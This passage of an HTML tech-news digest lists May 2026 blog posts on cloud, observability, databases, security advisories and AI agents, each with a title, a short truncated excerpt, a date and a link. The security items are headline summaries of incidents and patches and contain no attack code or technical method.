          📄 Amazon CloudWatch Logs announces increased query result limits
        </a>
        </h3><p>Amazon CloudWatch Logs now supports retrieving up to 100,000 results using the Logs Insights query language. Customers can specify the limit in their query using the LIMIT command. Previously, custome</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/cloudwatch-logs-query-results/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-simplify-cross-account-and-cross-region-stack-output-references-with-aws-cloudformation-and-cdks-new-fngetstackoutput" class="group relative scroll-mt-24">
        <a href="#h3-simplify-cross-account-and-cross-region-stack-output-references-with-aws-cloudformation-and-cdks-new-fngetstackoutput" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Simplify cross-account and cross-Region stack output references with AWS CloudFormation and CDK’s new Fn::GetStackOutput
        </a>
        </h3><p>AWS CloudFormation makes it easy to model and provision your cloud application infrastructure as code. CloudFormation templates can be written directly in JSON or YAML, or they can be generated by too</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 AWS DevOps Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/devops/simplify-cross-account-and-cross-region-stack-output-references-with-aws-cloudformation-and-cdks-new-fngetstackoutput/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-building-ai-agents-has-changed-in-2026" class="group relative scroll-mt-24">
        <a href="#h3-how-building-ai-agents-has-changed-in-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How Building AI Agents Has Changed in 2026
        </a>
        </h3><p>Twelve months ago, building an AI agent meant picking a framework, defining your tools, standing up a RAG pipeline, and writing a stack of glue code to wire it all together. That was the default playb</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/how-building-ai-agents-has-changed/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-observability" class="group relative scroll-mt-24">
        <a href="#h2-observability" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📊 Observability
        </a>
        </h2><h3 id="h3-inside-the-llm-call-genai-observability-with-opentelemetry" class="group relative scroll-mt-24">
        <a href="#h3-inside-the-llm-call-genai-observability-with-opentelemetry" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Inside the LLM Call: GenAI Observability with OpenTelemetry
        </a>
        </h3><p>Your AI agent just took 45 seconds to answer a simple question. Was it the model? A slow tool call? A retry loop? Every time an application calls an LLM, a chain of model calls, tool invocations, and </p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 OpenTelemetry Blog</strong></p>
<p><a href="https://opentelemetry.io/blog/2026/genai-observability/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-new-ways-to-agentically-build-and-edit-dashboards" class="group relative scroll-mt-24">
        <a href="#h3-new-ways-to-agentically-build-and-edit-dashboards" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 New ways to agentically build and edit dashboards
        </a>
        </h3><p>Create and edit Sentry dashboards with AI agents, the Sentry CLI, or pre-built templates you can clone and customize for your monitoring needs.</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 Sentry Blog</strong></p>
<p><a href="https://blog.sentry.io/dashboard-updates/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-assisted-testing-extensions-updates-and-more-k6-20-is-here" class="group relative scroll-mt-24">
        <a href="#h3-ai-assisted-testing-extensions-updates-and-more-k6-20-is-here" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI-assisted testing, extensions updates, and more: k6 2.0 is here
        </a>
        </h3><p>For years, teams have relied on k6 to take a more proactive approach to performance testing, ensuring they can catch issues early and deliver more reliable user experiences. That approach has helped m</p>
<p><strong>📅 May 12, 2026</strong> • <strong>📰 Grafana Blog</strong></p>
<p><a href="https://grafana.com/blog/k6-2-0-release/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-introducing-otel-blueprints-and-reference-implementations" class="group relative scroll-mt-24">
        <a href="#h3-introducing-otel-blueprints-and-reference-implementations" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Introducing OTel Blueprints and Reference Implementations
        </a>
        </h3><p>It’s not uncommon for end users adopting OpenTelemetry to, at some point in their journey, ask themselves: “Why is this stuff so complex?”. Full adoption normally requires understanding the different </p>
<p><strong>📅 May 12, 2026</strong> • <strong>📰 OpenTelemetry Blog</strong></p>
<p><a href="https://opentelemetry.io/blog/2026/blueprints-intro/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-security" class="group relative scroll-mt-24">
        <a href="#h2-security" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔐 Security
        </a>
        </h2><h3 id="h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="group relative scroll-mt-24">
        <a href="#h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Threats Making WAVs - Incident Response to a Cryptomining Attack
        </a>
        </h3><p>Guardicore security researchers describe and uncover a full analysis of a cryptomining attack, which hid a cryptominer inside WAV files. The report includes the full attack vectors, from detection, in</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/threats-making-wavs-incident-reponse-cryptomining-attack"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-finding-the-blind-spot-how-canonical-hunts-logic-flaws-with-ai" class="group relative scroll-mt-24">
        <a href="#h3-finding-the-blind-spot-how-canonical-hunts-logic-flaws-with-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Finding the blind spot: How Canonical hunts logic flaws with AI
        </a>
        </h3><p>AI is accelerating and improving how security engineers find and fix vulnerabilities. A new tool developed and used at Canonical, called Redhound, has already uncovered three critical logic vunerabili</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/finding-the-blind-spot-how-canonical-hunts-logic-flaws-with-ai"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-malicious-node-ipc-versions-published-to-npm-in-suspected-maintainer-account-compromise" class="group relative scroll-mt-24">
        <a href="#h3-malicious-node-ipc-versions-published-to-npm-in-suspected-maintainer-account-compromise" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Malicious node-ipc versions published to npm in suspected maintainer account compromise
        </a>
        </h3><p>On May 14, 2026, multiple malicious versions of the popular npm package node-ipc were published to the npm registry. Current public reporting identifies node...</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/malicious-node-ipc-versions-published-npm/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-cloudnativepg-1291-and-1283-released-critical-cve-fix" class="group relative scroll-mt-24">
        <a href="#h3-cloudnativepg-1291-and-1283-released-critical-cve-fix" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 CloudNativePG 1.29.1 and 1.28.3 released: critical CVE fix
        </a>
        </h3><p>The CloudNativePG community is releasing maintenance updates for all currently supported series: 1.29.1 and 1.28.3. This is a high-priority release. It addresses CVE-2026-44477 (the first CVE official</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/cloudnativepg-1291-and-1283-released-critical-cve-fix-3296/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-fragnesia-linux-kernel-local-privilege-escalation-vulnerability-mitigations" class="group relative scroll-mt-24">
        <a href="#h3-fragnesia-linux-kernel-local-privilege-escalation-vulnerability-mitigations" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Fragnesia Linux kernel local privilege escalation vulnerability mitigations
        </a>
        </h3><p>A local privilege escalation (LPE) vulnerability affecting the Linux kernel has been publicly disclosed on May 13, 2026. The vulnerability does not have a CVE ID published, but is referred to as “Frag</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/fragnesia-linux-vulnerability-fixes-available"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-postgresql-184-1710-1614-1518-and-1423-released" class="group relative scroll-mt-24">
        <a href="#h3-postgresql-184-1710-1614-1518-and-1423-released" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 PostgreSQL 18.4, 17.10, 16.14, 15.18, and 14.23 Released!
        </a>
        </h3><p>The PostgreSQL Global Development Group has released an update to all supported versions of PostgreSQL, including 18.4, 17.10, 16.14, 15.18, and 14.23. This release fixes 11 security vulnerabilities a</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/postgresql-184-1710-1614-1518-and-1423-released-3297/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-scaling-enterprise-ai-delivering-models-as-a-service-with-red-hat-openshift-ai-34" class="group relative scroll-mt-24">
        <a href="#h3-scaling-enterprise-ai-delivering-models-as-a-service-with-red-hat-openshift-ai-34" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Scaling enterprise AI: Delivering Models-as-a-Service with Red Hat OpenShift AI 3.4
        </a>
        </h3><p>Discover how Red Hat OpenShift AI 3.4 and Red Hat Connectivity Link deliver Models-as-a-Service (MaaS) to centrally govern and scale enterprise AI model serving. Many enterprises have moved past the AI</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/scaling-enterprise-ai-delivering-models-service-openshift-ai-34"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-rethinking-byod-security-protecting-data-without-trusting-devices" class="group relative scroll-mt-24">
        <a href="#h3-rethinking-byod-security-protecting-data-without-trusting-devices" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Rethinking BYOD security: protecting data without trusting devices
        </a>
        </h3><p>BYOD (bring your own device) has always looked better on paper than it does in real life. The promise is clear: let people use the gadgets they already own. Less friction, lower costs, and more freedo</p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/rethinking-byod-security-protecting-data-without-trusting-devices"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-5-ways-to-fix-misleading-vulnerability-severities-with-policy" class="group relative scroll-mt-24">
        <a href="#h3-5-ways-to-fix-misleading-vulnerability-severities-with-policy" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 5 ways to fix misleading vulnerability severities with policy
        </a>
        </h3><p>A typical enterprise vulnerability report surfaces hundreds of findings per scan cycle, all ranked by the Common Vulnerability Scoring System (CVSS). The problem: CVSS describes the theoretical charac</p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/severity-override-vulnerability-management-policy/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-blog-introducing-prempti-falco-meets-ai-coding-agents" class="group relative scroll-mt-24">
        <a href="#h3-blog-introducing-prempti-falco-meets-ai-coding-agents" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Blog: Introducing Prempti: Falco meets AI coding agents
        </a>
        </h3><p>Today&#39;s developer workflow is increasingly reliant on AI coding agents. Tools like Claude Code sit in your terminal, read your files, run shell commands, make network requests, and write code, all on </p>
<p><strong>📅 May 12, 2026</strong> • <strong>📰 Falco Blog</strong></p>
<p><a href="https://falco.org/blog/introducing-prempti/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-fighting-tool-sprawl-the-case-for-ai-tool-registries" class="group relative scroll-mt-24">
        <a href="#h3-fighting-tool-sprawl-the-case-for-ai-tool-registries" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Fighting Tool Sprawl: The Case for AI Tool Registries
        </a>
        </h3><p>As enterprise AI agent adoption scales, the absence of centralized, organization-level tool infrastructure is producing compounding costs. When adoption is built around optimizing for deployment speed</p>
<p><strong>📅 May 11, 2026</strong> • <strong>📰 MongoDB Blog</strong></p>
<p><a href="https://www.mongodb.com/company/blog/technical/fighting-tool-sprawl-case-for-ai-tool-registries"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-databases" class="group relative scroll-mt-24">
        <a href="#h2-databases" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          💾 Databases
        </a>
        </h2><h3 id="h3-one-agent-one-sandbox-one-database-inside-the-kimi-k26-architecture" class="group relative scroll-mt-24">
        <a href="#h3-one-agent-one-sandbox-one-database-inside-the-kimi-k26-architecture" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 One Agent, One Sandbox, One Database: Inside the Kimi K2.6 Architecture
        </a>
        </h3><p>A few months back I wrote two pieces about what infrastructure agents actually need: One on the database trends shaping 2026, another on why agents are the new database users. The arguments stayed mos</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 TiDB Blog</strong></p>
<p><a href="https://www.pingcap.com/blog/agent-database-kimi-k2-6/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-key-value-is-misleading-access-patterns-are-key" class="group relative scroll-mt-24">
        <a href="#h3-key-value-is-misleading-access-patterns-are-key" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 “Key-Value” is Misleading. Access Patterns are Key.
        </a>
        </h3><p>Access patterns determine your data model, your I/O costs, and which database is the best fit for your workload</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 ScyllaDB Blog</strong></p>
<p><a href="https://www.scylladb.com/2026/05/14/access-patterns-are-key/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-context-engineering-for-ai-what-it-is-how-to-build-it" class="group relative scroll-mt-24">
        <a href="#h3-context-engineering-for-ai-what-it-is-how-to-build-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Context engineering for AI: what it is & how to build it
        </a>
        </h3><p>Your support agent confidently tells a customer they qualify for a refund under a 60-day return policy. Your actual policy is 30 days. The agent hallucinated the longer window, and the easy reaction i</p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/context-engineering-ai/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-to-tame-the-thundering-herd-problem" class="group relative scroll-mt-24">
        <a href="#h3-how-to-tame-the-thundering-herd-problem" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How to tame the thundering herd problem
        </a>
        </h3><p>The thundering herd problem occurs when multiple processes or clients repeatedly request the same resource simultaneously, leading to excessive load and performance degradation. If you grew up on clas</p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/how-to-tame-the-thundering-herd-problem/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-tidb-scaile-europe-2026-speaker-lineup-and-session-preview" class="group relative scroll-mt-24">
        <a href="#h3-tidb-scaile-europe-2026-speaker-lineup-and-session-preview" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 TiDB SCaiLE Europe 2026: Speaker Lineup and Session Preview
        </a>
        </h3><p>Agentic AI changes the database problem. A single user action can trigger many agent steps. However, each agent needs state, memory, transactions, analytics, and retrieval to stay consistent under rea</p>
<p><strong>📅 May 12, 2026</strong> • <strong>📰 TiDB Blog</strong></p>
<p><a href="https://www.pingcap.com/blog/tidb-scaile-europe-2026/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-new-research-on-cloud-database-trends-technical-risks-cost-pressures-and-migration-triggers" class="group relative scroll-mt-24">
        <a href="#h3-new-research-on-cloud-database-trends-technical-risks-cost-pressures-and-migration-triggers" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 New Research on Cloud Database Trends: Technical Risks, Cost Pressures, and Migration Triggers
        </a>
        </h3><p>Good enough until it isn’t: the database complacency trap</p>
<p><strong>📅 May 12, 2026</strong> • <strong>📰 ScyllaDB Blog</strong></p>
<p><a href="https://www.scylladb.com/2026/05/12/new-research-on-cloud-database-trends/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-shopping-assistants-how-they-work-what-to-build" class="group relative scroll-mt-24">
        <a href="#h3-ai-shopping-assistants-how-they-work-what-to-build" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI shopping assistants: how they work & what to build
        </a>
        </h3><p>You type &quot;cozy winter sweater&quot; into a search bar and get zero results because no product is tagged with that exact phrase. Keyword search can&#39;t tell that a &quot;wool pullover&quot; is the same idea. AI shoppin</p>
<p><strong>📅 May 12, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/ai-shopping-assistant/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-dynamic-endpoints-migrate-databases-without-changing-your-endpoint" class="group relative scroll-mt-24">
        <a href="#h3-dynamic-endpoints-migrate-databases-without-changing-your-endpoint" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Dynamic endpoints: Migrate databases without changing your endpoint
        </a>
        </h3><p>Most teams don’t move Redis databases often. But when they do, the complexity is rarely in Redis itself. It’s in coordinating endpoint changes across apps, services, and jobs. Redis Cloud now supports</p>
<p><strong>📅 May 12, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/dynamic-endpoints-migrate-databases-without-changing-your-endpoint/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-from-preview-to-production-tidb-cloud-dedicated-on-microsoft-azure-is-now-generally-available" class="group relative scroll-mt-24">
        <a href="#h3-from-preview-to-production-tidb-cloud-dedicated-on-microsoft-azure-is-now-generally-available" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From Preview to Production: TiDB Cloud Dedicated on Microsoft Azure is Now Generally Available
        </a>
        </h3><p>For teams standardized on Azure, distributed SQL has been a tradeoff. Stay on managed SQL Server or Azure Database for MySQL and live with single-instance scale ceilings. Step outside Azure to get hor</p>
<p><strong>📅 May 11, 2026</strong> • <strong>📰 TiDB Blog</strong></p>
<p><a href="https://www.pingcap.com/blog/tidb-cloud-dedicated-ga-microsoft-azure/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-platforms" class="group relative scroll-mt-24">
        <a href="#h2-platforms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🌐 Platforms
        </a>
        </h2><h3 id="h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="group relative scroll-mt-24">
        <a href="#h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Keep Your Tech Flame Alive: Trailblazer Rachel Bayley
        </a>
        </h3><p>In this Akamai FLAME Trailblazer blog post, Rachel Bayley encourages women to step into the unknown and to be their authentic selves.</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/culture/2024/may/keep-your-tech-flame-alive-trailblazer-rachel-bayley"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-oracle-of-delphi-will-steal-your-credentials" class="group relative scroll-mt-24">
        <a href="#h3-the-oracle-of-delphi-will-steal-your-credentials" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Oracle of Delphi Will Steal Your Credentials
        </a>
        </h3><p>Our deception technology is able to reroute attackers into honeypots, where they believe that they found their real target. The attacks brute forced passwords for RDP credentials to connect to the vic</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-oracle-of-delphi-steal-your-credentials"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="group relative scroll-mt-24">
        <a href="#h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Nansh0u Campaign – Hackers Arsenal Grows Stronger
        </a>
        </h3><p>In the beginning of April, three attacks detected in the Guardicore Global Sensor Network (GGSN) caught our attention. All three had source IP addresses originating in South Africa and hosted by Volum</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-nansh0u-campaign-hackers-arsenal-grows-stronger"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-emr-serverless-is-now-available-in-additional-aws-regions" class="group relative scroll-mt-24">
        <a href="#h3-amazon-emr-serverless-is-now-available-in-additional-aws-regions" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon EMR Serverless is now available in additional AWS Regions
        </a>
        </h3><p>Amazon EMR Serverless is now generally available in six additional AWS Regions - Asia Pacific (Hyderabad), Asia Pacific (Malaysia), Asia Pacific (New Zealand), Asia Pacific (Taipei), Asia Pacific (Tha</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/amazon-emr-serverless-aws-regions/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-aws-partner-central-agents-now-accelerates-opportunity-creation" class="group relative scroll-mt-24">
        <a href="#h3-aws-partner-central-agents-now-accelerates-opportunity-creation" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AWS Partner Central agents now accelerates opportunity creation
        </a>
        </h3><p>Today, AWS announces that the AWS Partner Central agents now accelerate opportunity creation through natural language conversation. AWS Partner Central agents, released on March 16, 2026, are AI-power</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/aws-partner-central-agents-oppo"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-connect-cases-now-lets-you-edit-related-items-and-delete-cases-from-the-agent-workspace" class="group relative scroll-mt-24">
        <a href="#h3-amazon-connect-cases-now-lets-you-edit-related-items-and-delete-cases-from-the-agent-workspace" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon Connect Cases now lets you edit related items and delete cases from the agent workspace
        </a>
        </h3><p>Amazon Connect Cases now supports editing and deleting related items, and deleting cases directly from the agent workspace without administrator help. Agents can update comments, unlink contacts assoc</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/amazon-connect-cases-related-item/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gemini-live-agent-challenge-announcing-the-winners-and-highlights" class="group relative scroll-mt-24">
        <a href="#h3-gemini-live-agent-challenge-announcing-the-winners-and-highlights" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Gemini Live Agent Challenge: Announcing the winners and highlights
        </a>
        </h3><p>The Gemini Live Agent Challenge is officially in the books! We challenged developers worldwide to break out of the traditional &#39;text box&#39; paradigm by building next-generation AI agents. From our initi</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/developers-practitioners/winners-and-highlights-of-the-gemini-live-agent-challenge/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-welcome-to-blackfile-inside-a-vishing-extortion-operation" class="group relative scroll-mt-24">
        <a href="#h3-welcome-to-blackfile-inside-a-vishing-extortion-operation" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Welcome to BlackFile: Inside a Vishing Extortion Operation
        </a>
        </h3><p>Written by: Austin Larsen, Tyler McLellan, Genevieve Stark, Dan Ebreo Introduction Google Threat Intelligence Group (GTIG) has continued to track an expansive extortion campaign by UNC6671, a threat a</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/threat-intelligence/blackfile-vishing-extortion-operation/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-friday-five-may-15-2026" class="group relative scroll-mt-24">
        <a href="#h3-friday-five-may-15-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Friday Five — May 15, 2026
        </a>
        </h3><p>Catch up on the news at Red Hat Summit 2026. This definitive guide to all of Red Hat&#39;s news offers a centralized view of the latest product innovations, strategic collaborations, and visionary milestone</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/friday-five-may-15-2026-red-hat"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-scaling-sap-hana-performance-insights-from-aws-intel-and-suse" class="group relative scroll-mt-24">
        <a href="#h3-scaling-sap-hana-performance-insights-from-aws-intel-and-suse" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Scaling SAP HANA Performance: Insights from AWS, Intel, and SUSE
        </a>
        </h3><p>Most SAP teams know they need to move to the cloud. The hesitation isn’t about whether they should, it’s about what happens to performance when you get there. On-premises SAP HANA appliances are predi</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 SUSE Blog</strong></p>
<p><a href="https://www.suse.com/c/scaling-sap-hana-performance-insights-from-aws-intel-and-suse/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-may-patches-for-azure-devops-server" class="group relative scroll-mt-24">
        <a href="#h3-may-patches-for-azure-devops-server" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 May Patches for Azure DevOps Server
        </a>
        </h3><p>We are releasing new patches for our self‑hosted product, Azure DevOps Server. We strongly recommend that all customers stay up to date with the latest, most secure version of Azure DevOps Server. The</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 Azure DevOps Blog</strong></p>
<p><a href="https://devblogs.microsoft.com/devops/may-patches-for-azure-devops-server-3/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-cloud-ciso-perspectives-how-google-wiz-changes-multicloud-strategy-for-cisos" class="group relative scroll-mt-24">
        <a href="#h3-cloud-ciso-perspectives-how-google-wiz-changes-multicloud-strategy-for-cisos" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Cloud CISO Perspectives: How Google + Wiz changes multicloud strategy for CISOs
        </a>
        </h3><p>Welcome to the first Cloud CISO Perspectives for May 2026. Today, Vinod D’Souza, director, Office of the CISO, shares highlights from his RSA Conference fireside chat with Anthony Belfiore, chief stra</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-how-google-wiz-changes-multicloud-strategy-for-cisos/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-misc" class="group relative scroll-mt-24">
        <a href="#h2-misc" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📰 Misc
        </a>
        </h2><h3 id="h3-visual-studio-code-1121" class="group relative scroll-mt-24">
        <a href="#h3-visual-studio-code-1121" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Visual Studio Code 1.121
        </a>
        </h3><p>Learn what&#39;s new in Visual Studio Code 1.121 (Insiders)</p>
<p><strong>📅 May 20, 2026</strong> • <strong>📰 VS Code Blog</strong></p>
<p><a href="https://code.visualstudio.com/updates/v1_121"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-mac-mini-just-became-infrastructure" class="group relative scroll-mt-24">
        <a href="#h3-the-mac-mini-just-became-infrastructure" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Mac mini just became infrastructure
        </a>
        </h3><p>On April 30, Apple’s Q2 2026 earnings call did something unusual. Tim Cook spent meaningful airtime on Mac mini and</p>
<p><strong>📅 May 17, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/mac-mini-agent-infrastructure/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-clean-up-cost-of-ai-generated-code-is-what-the-velocity-narrative-leaves-out" class="group relative scroll-mt-24">
        <a href="#h3-the-clean-up-cost-of-ai-generated-code-is-what-the-velocity-narrative-leaves-out" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The clean-up cost of AI-generated code is what the velocity narrative leaves out
        </a>
        </h3><p>The world is actively using AI to make our lives more efficient and safe — from creative writing to safer</p>
<p><strong>📅 May 16, 2026</strong> • <strong>📰 The New Stack</strong></p>
